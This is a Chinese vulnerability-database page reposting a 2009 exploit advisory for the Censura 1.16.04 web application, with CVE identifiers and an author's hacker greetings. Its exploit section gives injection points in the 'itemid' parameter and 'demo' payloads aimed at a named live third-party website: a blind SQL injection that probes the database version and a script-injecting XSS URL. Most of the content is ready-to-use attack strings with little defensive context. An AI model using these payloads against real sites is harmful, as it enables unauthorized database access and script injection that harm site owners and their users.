Censura 1.16.04 (bSQL/XSS) Multiple Remote Vulnerabilities

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1051804 漏洞类型
发布时间 2009-07-14 更新时间 2009-07-14
CVE编号 CVE-2009-2593
CVE-2009-2594
CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2009070024
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
 Title    : (Blind SQL/XSS) Multiple Remote Vulnerabilities
 Software : Censura v1.16.04
 Vendor   : http://www.censura.info/
 
 Date     : 12 July 2009 (Indonesia)
 Author   : Vrs-hCk
 Contact  : d00r@telkom.net
 Blog     : http://c0li.blogspot.com/

 ==

 [-] Exploit

     http://[site]/[path]/censura.php?cmd=details&itemid=[bSQL]
     http://[site]/[path]/censura.php?cmd=details&itemid=[XSS]

 [-] Demo

     http://www.yoozreviews.com/censura.php?cmd=details&itemid=61 and substring(@@version,1,1)=4
     http://www.yoozreviews.com/censura.php?cmd=details&itemid=<script>alert(123)</script>

 ==

 Greetz   :

     Paman, NoGe, OoN_Boy, Angela Chang, pizzyroot, zxvf, ajegille, em|nem, loqsa, Fluzy,
     bl4Ck_3n91n3, H312Y, S3T4N, Janroe, and special muaacchh buat Dia yg Ku Cintai (*_^)
     c0li.m0de.0n and Behave oR BeGone !!!